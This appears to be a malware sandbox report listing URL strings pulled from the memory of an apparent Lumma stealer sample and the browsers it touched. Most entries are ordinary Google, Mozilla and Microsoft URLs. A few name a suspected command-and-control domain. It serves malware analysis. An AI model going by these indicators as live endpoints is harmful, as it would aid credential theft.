Source: Lumma111.exe, 00000009.00000003.2584044251.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2590187575.0000000001003000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2584068726.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/aping
Source: Lumma111.exe, 00000009.00000003.2584044251.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2590187575.0000000001003000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2584068726.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/cO
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: chrome.exe, 00000010.00000003.2799527090.0000481C02858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2866381760.0000481C02844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000010.00000003.2793026400.0000481C023C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3303782792.000002087AA79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000010.00000002.2845398055.0000481C022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2862619011.0000481C02594000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D472000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3047503720.000002086BDDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2863608559.0000481C026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868794782.0000481C02984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyM
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2863608559.0000481C026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868794782.0000481C02984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000010.00000002.2870742199.0000481C02B2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2863608559.0000481C026A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868794782.0000481C02984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000010.00000002.2872339216.0000481C02BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3303782792.000002087AA79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: chrome.exe, 00000010.00000002.2858566619.0000481C024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://payments.g
Source: chrome.exe, 00000010.00000002.2858566619.0000481C024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://payments.ge.co
Source: chrome.exe, 00000010.00000002.2872339216.0000481C02BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: chrome.exe, 00000010.00000002.2872339216.0000481C02BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: chrome.exe, 00000010.00000002.2844792331.0000481C0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: chrome.exe, 00000010.00000002.2845071498.0000481C022B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: cfc45d1c7c.exe, 0000000A.00000003.2669570281.0000000005AA0000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2827034300.0000000005A92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: cfc45d1c7c.exe, 0000000A.00000003.2669570281.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2827034300.0000000005A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: cfc45d1c7c.exe, 0000000A.00000003.2669570281.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2827034300.0000000005A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: chrome.exe, 00000010.00000002.2872551577.0000481C02C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869212539.0000481C029DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: chrome.exe, 00000010.00000002.2865921179.0000481C027E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872792194.0000481C02C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000010.00000002.2869450771.0000481C02A1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000010.00000002.2869717115.0000481C02A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000010.00000002.2869717115.0000481C02A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2866120398.0000481C0280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsightstime
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000010.00000002.2872792194.0000481C02C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
